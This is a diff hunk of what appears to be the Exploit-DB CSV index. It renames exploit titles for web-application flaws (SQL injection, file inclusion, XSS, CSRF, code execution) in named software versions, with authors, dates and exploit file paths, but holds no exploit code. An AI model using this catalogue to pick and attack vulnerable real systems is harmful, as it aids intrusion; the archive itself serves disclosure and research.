18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x / <= 3.70) Classic 3.01 - Local File Inclusion",2011-11-02,"Rami Salama",php,webapps,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 @@ -25213,7 +25216,7 @@ id,file,description,date,author,platform,type,port 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18480,platforms/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,php,webapps,0 -18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2012-02-12,"Avram Marius",php,webapps,0 +18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",php,webapps,0 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request Forgery",2012-02-20,"Ivano Binetti",hardware,webapps,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",php,webapps,0 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Inclusion",2012-02-17,Vulnerability-Lab,php,webapps,0 @@ -25227,7 +25230,7 @@ id,file,description,date,author,platform,type,port 18563,platforms/php/webapps/18563.txt,"Fork CMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18506,platforms/php/webapps/18506.txt,"Brim < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 18508,platforms/php/webapps/18508.txt,"LimeSurvey (PHPSurveyor 1.91+ stable) - Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 -18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 +18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - Steal Authentication Credentials",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 @@ -25289,7 +25292,7 @@ id,file,description,date,author,platform,type,port 18649,platforms/php/webapps/18649.txt,"FreePBX 2.10.0 / 2.9.0 - Multiple Vulnerabilities",2012-03-22,"Martin Tschirsich",php,webapps,0 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 - Multiple Cross-Site Request Forgery Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 -18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - (Cross-Site Request Forgery / Cross-Site Scripting) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 +18652,platforms/php/webapps/18652.txt,"Wolfcms 0.75 - Cross-Site Request Forgery / Cross-Site Scripting",2012-03-23,"Ivano Binetti",php,webapps,0 18655,platforms/php/webapps/18655.php,"PHPFox 3.0.1 - (ajax.php) Remote Command Execution",2012-03-23,EgiX,php,webapps,0 18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution (Metasploit)",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS 0.53 - Multiple Local File Inclusion",2012-03-24,localh0t,php,webapps,0 @@ -25375,7 +25378,7 @@ id,file,description,date,author,platform,type,port 18881,platforms/java/webapps/18881.txt,"Liferay Portal 6.0.x < 6.1 - Privilege Escalation",2012-05-13,"Jelmer Kuperus",java,webapps,0 18882,platforms/php/webapps/18882.txt,"b2ePms 1.0 - Authentication Bypass",2012-05-15,"Jean Pascal Pereira",php,webapps,0 18884,platforms/php/webapps/18884.txt,"S9Y Serendipity 1.6 - (Backend) Cross-Site Scripting / SQL Injection",2012-05-08,"Stefan Schurtz",php,webapps,0 -18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - (Cross-Site Request Forgery / Persistent Cross-Site Scripting) Multiple Vulnerabilities",2012-05-16,"Ivano Binetti",php,webapps,0 +18886,platforms/php/webapps/18886.txt,"Axous 1.1.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2012-05-16,"Ivano Binetti",php,webapps,0 18888,platforms/jsp/webapps/18888.txt,"OpenKM Document Management System 5.1.7 - Command Execution",2012-01-03,"Cyrill Brunschwiler",jsp,webapps,0 18889,platforms/php/webapps/18889.txt,"Artiphp CMS 5.5.0 - Database Backup Disclosure",2012-05-16,LiquidWorm,php,webapps,0 18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 @@ -26045,7 +26048,7 @@ id,file,description,date,author,platform,type,port 22263,platforms/cgi/webapps/22263.pl,"cPanel 5.0 - Guestbook.cgi Remote Command Execution (4)",2003-02-19,pokleyzz,cgi,webapps,0 22266,platforms/php/webapps/22266.php,"PHP-Nuke 5.6/6.0 - Search Engine SQL Injection",2003-02-19,"David Zentner",php,webapps,0 22267,platforms/php/webapps/22267.php,"PHPBB2 - Page_Header.php SQL Injection",2003-02-19,"David Zentner",php,webapps,0 -22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - links.php Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 +22268,platforms/php/webapps/22268.txt,"myPHPNuke 1.8.8 - 'links.php' Cross-Site Scripting",2003-02-20,"Tacettin Karadeniz",php,webapps,0 22277,platforms/php/webapps/22277.txt,"Nuked-klaN 1.3 - Remote Information Disclosure",2003-02-23,"gregory Le Bras",php,webapps,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 - Cookie Validation",2003-02-24,"Simen Bergo",php,webapps,0 22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure",2003-02-24,frog,php,webapps,0 @@ -26363,7 +26366,7 @@ id,file,description,date,author,platform,type,port 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 - banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 - emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23160,platforms/php/webapps/23160.txt,"Mambo Site Server 4.0.14 - contact.php Unauthorized Mail Relay",2003-09-18,"Lifo Fifo",php,webapps,0 -23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - sql_id Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 +23163,platforms/php/webapps/23163.txt,"Flying Dog Software Powerslave 4.3 Portalmanager - 'sql_id' Information Disclosure",2003-09-19,"H Zero Seven",php,webapps,0 23164,platforms/php/webapps/23164.txt,"myPHPNuke 1.8.8 - 'auth.inc.php' SQL Injection",2003-09-20,"Lifo Fifo",php,webapps,0 40403,platforms/php/webapps/40403.txt,"Dolphin 7.3.0 - Error-Based SQL Injection",2016-09-20,"Kacper Szurek",php,webapps,80 23175,platforms/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple Fields HTML Injection",2003-09-24,"Bahaa Naamneh",php,webapps,0 @@ -28508,9 +28511,9 @@ id,file,description,date,author,platform,type,port 26787,platforms/php/webapps/26787.txt,"phpCOIN 1.2.2 - CCFG[_PKG_PATH_DBSE] Remote File Inclusion",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26788,platforms/php/webapps/26788.txt,"PHPCOIN 1.2.2 - 'includes/db.php $_CCFG[_PKG_PATH_DBSE]' Parameter Traversal Arbitrary File Access",2005-12-13,retrogod@aliceposta.it,php,webapps,0 26789,platforms/php/webapps/26789.txt,"EncapsGallery 1.0 - gallery.php SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 -26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - comments.php Multiple Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 -26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - category.php search Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 -26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - picture.php image_id Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 +26790,platforms/php/webapps/26790.txt,"PHPWebGallery 1.3.4/1.5.1 - 'comments.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 +26791,platforms/php/webapps/26791.txt,"PHPWebGallery 1.3.4/1.5.1 - 'category.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 +26792,platforms/php/webapps/26792.txt,"PHPWebGallery 1.3.4/1.5.1 - 'picture.php' SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 26793,platforms/php/webapps/26793.txt,"Plogger Beta 2 - 'index.php' id Parameter SQL Injection",2005-12-13,r0t,php,webapps,0 26794,platforms/php/webapps/26794.txt,"Plogger Beta 2 - 'index.php' Multiple Parameter Cross-Site Scripting",2005-12-13,r0t,php,webapps,0 26795,platforms/php/webapps/26795.txt,"VCD-db 0.9x - search.php by Parameter SQL Injection",2005-12-13,r0t3d3Vil,php,webapps,0 @@ -28924,8 +28927,8 @@ id,file,description,date,author,platform,type,port 27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 - XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",php,webapps,0 27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 - jgs_galerie_slideshow.php Multiple Parameter Cross-Site Scripting",2006-02-23,nuker,php,webapps,0 27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 - Board jgs_galerie_scroll.php userid Parameter Cross-Site Scripting",2006-02-23,nuker,php,webapps,0 -27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - reviews.php letter Parameter Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 -27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - download.php dcategory Parameter Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 +27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 +27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - Scan_Lang_Insert.php Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0 @@ -29079,7 +29082,7 @@ id,file,description,date,author,platform,type,port 27514,platforms/php/webapps/27514.txt,"Tribq CMS 5.2.7 - Cross-Site Request Forgery (Adding/Editing New Administrator Account)",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27515,platforms/php/webapps/27515.txt,"Open Real Estate CMS 1.5.1 - Multiple Vulnerabilities",2013-08-12,"Yashar shahinzadeh",php,webapps,0 27518,platforms/php/webapps/27518.txt,"MLMAuction Script - 'gallery.php id Parameter' SQL Injection",2013-08-12,3spi0n,php,webapps,0 -27519,platforms/php/webapps/27519.txt,"phpVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 +27519,platforms/php/webapps/27519.txt,"PHPVID 1.2.3 - Multiple Vulnerabilities",2013-08-12,3spi0n,php,webapps,0 27729,platforms/php/webapps/27729.txt,"Scry Gallery 1.1 - 'index.php' Cross-Site Scripting",2006-04-24,mayank,php,webapps,0 27521,platforms/php/webapps/27521.txt,"Ajax PHP Penny Auction 1.x 2.x - Multiple Vulnerabilities",2013-08-12,"Taha Hunter",php,webapps,80 27522,platforms/php/webapps/27522.txt,"Gnew 2013.1 - Multiple Vulnerabilities (1)",2013-08-12,LiquidWorm,php,webapps,80 @@ -29125,8 +29128,8 @@ id,file,description,date,author,platform,type,port 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'index.php' page Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection",2006-04-10,Psych0,php,webapps,0 -27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - category.php Multiple Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - picture.php Multiple Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 +27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 +27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27589,platforms/php/webapps/27589.txt,"SPIP 1.8.3 - Spip_login.php Remote File Inclusion",2006-04-10,cR45H3R,php,webapps,0 27590,platforms/php/webapps/27590.txt,"APT-webshop 3.0/4.0 - modules.php Multiple SQL Injection",2005-04-10,r0t,php,webapps,0 27591,platforms/php/webapps/27591.txt,"Shadowed Portal 5.7 - Load.php Cross-Site Scripting",2006-04-10,Liz0ziM,php,webapps,0 @@ -29158,7 +29161,7 @@ id,file,description,date,author,platform,type,port 27628,platforms/php/webapps/27628.txt,"SWSoft Confixx 3.0.6/3.0.8/3.1.2 - 'index.php' SQL Injection",2006-04-11,LoK-Crew,php,webapps,0 27629,platforms/php/webapps/27629.txt,"Chipmunk Guestbook 1.3 - 'index.php' SQL Injection",2006-04-12,Dr.Jr7,php,webapps,0 27631,platforms/cgi/webapps/27631.txt,"Interaktiv.shop 4/5 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-12,r0t,cgi,webapps,0 -27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - sql.php Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 +27632,platforms/php/webapps/27632.txt,"phpMyAdmin 2.7 - 'sql.php' Cross-Site Scripting",2005-10-31,p0w3r,php,webapps,0 27638,platforms/php/webapps/27638.pl,"SimpleBBS 1.0.6/1.0.7/1.1 - Arbitrary Command Execution",2006-04-13,rUnViRuS,php,webapps,0 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0 @@ -29488,7 +29491,7 @@ id,file,description,date,author,platform,type,port 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 -28104,platforms/php/webapps/28104.txt,"ADOdb 4.6/4.7 - Tmssql.php Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 +28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 28105,platforms/php/webapps/28105.txt,"eNpaper1 - Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"Cpanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 @@ -29536,7 +29539,7 @@ id,file,description,date,author,platform,type,port 28157,platforms/php/webapps/28157.txt,"VirtuaStore 2.0 - Password Parameter SQL Injection",2006-07-03,supermalhacao,php,webapps,0 28158,platforms/php/webapps/28158.txt,"QTO File Manager 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-07-03,"EllipSiS Security",php,webapps,0 28159,platforms/php/webapps/28159.txt,"Glossaire 1.7 - Remote File Inclusion",2006-07-03,"CrAzY CrAcKeR",php,webapps,0 -28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - comments.php Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0 +28161,platforms/php/webapps/28161.txt,"PHPWebGallery 1.x - 'comments.php' Cross-Site Scripting",2006-07-04,iss4m,php,webapps,0 28162,platforms/php/webapps/28162.txt,"Randshop 0.9.3/1.2 - 'index.php' Remote File Inclusion",2006-07-04,black-code,php,webapps,0 28163,platforms/php/webapps/28163.txt,"PostNuke 0.6x/0.7x - Multiple Cross-Site Scripting Vulnerabilities",2006-07-04,rgod,php,webapps,0 28166,platforms/php/webapps/28166.pl,"LifeType 1.0.5 - 'index.php' Date Parameter SQL Injection",2006-07-05,"Alejandro Ramos",php,webapps,0 @@ -29969,7 +29972,7 @@ id,file,description,date,author,platform,type,port 28780,platforms/php/webapps/28780.txt,"Softerra PHP Developer Library 1.5.3 - Grid3.lib.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28781,platforms/php/webapps/28781.txt,"BlueShoes Framework 4.6 - GoogleSearch.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 28782,platforms/php/webapps/28782.txt,"Tagit2b - DelTagUser.php Remote File Inclusion",2006-10-10,k1tk4t,php,webapps,0 -28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - sql.php Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 +28783,platforms/php/webapps/28783.txt,"MySQLDumper 1.21 - 'sql.php' Cross-Site Scripting",2006-10-10,Crackers_Child,php,webapps,0 28784,platforms/php/webapps/28784.txt,"Gcards 1.13 - Addnews.php Remote File Inclusion",2006-10-11,"DeatH VirUs",php,webapps,0 28786,platforms/php/webapps/28786.pl,"CommunityPortals 1.0 - bug.php Remote File Inclusion",2006-10-11,"Nima Salehi",php,webapps,0 28787,platforms/php/webapps/28787.txt,"Dokeos 1.6.4 - Multiple Remote File Inclusions Vulnerabilities",2006-10-11,viper-haCker,php,webapps,0 @@ -30944,7 +30947,7 @@ id,file,description,date,author,platform,type,port 30230,platforms/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,php,webapps,0 30232,platforms/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",php,webapps,0 30234,platforms/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injections",2007-06-25,"Jesper Jurcenoks",php,webapps,0 -30235,platforms/php/webapps/30235.txt,"KikChat - (Local File Inclusion / Remote Code Execution) Multiple Vulnerabilities",2013-12-12,cr4wl3r,php,webapps,0 +30235,platforms/php/webapps/30235.txt,"KikChat - Local File Inclusion / Remote Code Execution",2013-12-12,cr4wl3r,php,webapps,0 30238,platforms/php/webapps/30238.txt,"Cythosia 2.x Botnet - SQL Injection",2013-12-12,GalaxyAndroid,php,webapps,0 30366,platforms/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,php,webapps,0 30246,platforms/php/webapps/30246.txt,"WHMCS 4.x / 5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",php,webapps,0 @@ -32144,7 +32147,7 @@ id,file,description,date,author,platform,type,port 32091,platforms/php/webapps/32091.txt,"MyBlog 0.9.8 - Multiple Remote Information Disclosure Vulnerabilities",2008-07-21,"AmnPardaz Security Research Team",php,webapps,0 32092,platforms/php/webapps/32092.txt,"Flip 3.0 - 'config.php' Remote File Inclusion",2008-07-21,Cru3l.b0y,php,webapps,0 32093,platforms/php/webapps/32093.txt,"PHPKF - 'forum_duzen.php' SQL Injection",2008-07-21,U238,php,webapps,0 -32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-21,Dr.Crash,php,webapps,0 +32096,platforms/php/webapps/32096.pl,"EasyE-Cards 3.10 - SQL Injection / Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 32097,platforms/php/webapps/32097.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Traversal Local File Inclusion",2008-07-21,Ciph3r,php,webapps,0 32098,platforms/php/webapps/32098.txt,"XOOPS 2.0.18 - modules/system/admin.php fct Parameter Cross-Site Scripting",2008-07-21,Ciph3r,php,webapps,0 32099,platforms/php/webapps/32099.txt,"RunCMS 1.6.1 - 'bbPath[path]' Parameter Remote File Inclusion",2008-07-21,Ciph3r,php,webapps,0 @@ -32219,7 +32222,7 @@ id,file,description,date,author,platform,type,port 32204,platforms/hardware/webapps/32204.txt,"ZYXEL Router P-660HN-T1A - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 -32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - (Cross-Site Request Forgery/Blind SQL Injection) Multiple Vulnerabilities",2014-03-12,"TUNISIAN CYBER",php,webapps,80 +32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0 @@ -32780,8 +32783,8 @@ id,file,description,date,author,platform,type,port 33237,platforms/php/webapps/33237.txt,"Joomla! Component SportFusion 0.2.x - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 33238,platforms/php/webapps/33238.txt,"Joomla! Component JoomlaFacebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0 33239,platforms/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 -33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 -33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - view_mag.php mag_id Parameter Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps,0 +33240,platforms/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,php,webapps,0 +33241,platforms/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,php,webapps,0 33242,platforms/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,php,webapps,0 33345,platforms/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",php,webapps,0 33343,platforms/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Parameter Cross-Site Scripting",2009-11-10,"Andrew Horton",php,webapps,0 @@ -35658,7 +35661,7 @@ id,file,description,date,author,platform,type,port 37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37934,platforms/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 -37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 +37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 37936,platforms/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Parameter Local File Inclusion",2012-10-06,L0n3ly-H34rT,php,webapps,0 37955,platforms/php/webapps/37955.html,"Pligg CMS 2.0.2 - Cross-Site Request Forgery (Add Admin)",2015-08-24,"Arash Khazaei",php,webapps,80 37956,platforms/php/webapps/37956.txt,"WordPress Theme GeoPlaces3 - Arbitrary File Upload",2015-08-24,Mdn_Newbie,php,webapps,80 @@ -35790,7 +35793,7 @@ id,file,description,date,author,platform,type,port 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38171,platforms/php/webapps/38171.txt,"Joomla! Component 'com_incapsula' - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 38178,platforms/php/webapps/38178.txt,"WordPress Plugin NextGEN Gallery - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 -38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 +38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple Vulnerabilities",2015-09-14,xistence,multiple,webapps,0 38180,platforms/php/webapps/38180.txt,"tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting",2013-01-09,MustLive,php,webapps,0 38176,platforms/php/webapps/38176.txt,"WordPress Plugin EZ SQL Reports < 4.11.37 - Multiple Vulnerabilities",2015-09-14,"Felipe Molina",php,webapps,0 @@ -36588,7 +36591,7 @@ id,file,description,date,author,platform,type,port 39909,platforms/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity Exploit",2016-06-10,hantwister,xml,webapps,0 40047,platforms/php/webapps/40047.txt,"Phoenix Exploit Kit - Remote Code Execution",2016-07-01,CrashBandicot,php,webapps,80 39911,platforms/php/webapps/39911.html,"Mobiketa 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-10,"Murat Yilmazlar",php,webapps,80 -39912,platforms/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (Execute SQL Query)",2016-06-10,HaHwul,php,webapps,80 +39912,platforms/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)",2016-06-10,HaHwul,php,webapps,80 39913,platforms/php/webapps/39913.txt,"phpMyFAQ 2.9.0 - Persistent Cross-Site Scripting",2016-06-10,"Kacper Szurek",php,webapps,80 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 @@ -36901,4 +36904,4 @@ id,file,description,date,author,platform,type,port 40939,platforms/php/webapps/40939.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 40940,platforms/php/webapps/40940.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2016-12-16,"Lenon Leite",php,webapps,0 40941,platforms/php/webapps/40941.txt,"WordPress Plugin 404 Redirection Manager 1.0 - SQL Injection",2016-12-19,"Ahmed Sherif",php,webapps,0 -40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 +40942,platforms/multiple/webapps/40942.py,"ntop-ng 2.5.160805 - Username Enumeration",2016-08-04,"Dolev Farhi",multiple,webapps,0 diff --git 